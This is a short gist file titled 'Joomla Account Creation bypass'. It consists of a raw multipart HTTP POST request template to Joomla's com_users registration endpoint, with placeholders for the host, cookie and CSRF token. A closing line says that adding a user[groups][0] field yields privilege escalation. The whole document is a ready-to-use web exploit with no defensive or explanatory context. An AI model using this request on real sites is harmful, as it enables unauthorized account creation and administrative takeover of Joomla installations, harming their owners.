Joomla Account Creation bypass

gistfile1.txt

POST /index.php?option=com_users&task=user.register HTTP/1.1
Host: [INSERT_HOST]
Referer: [INSERT_HOST]/index.php/component/users/?view=registration
Cookie: [INSERT_COOKIE]
Connection: close

------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[name]"

hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[username]"

hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password1]"

password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password2]"

password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email1]"

email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email2]"

email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="[INSERT_SECURITY_TOKEN]"

1
------WebKitFormBoundarydPTNyMPMzmAhBsf4--

name = "user[groups][0]" gets you privilege escalation.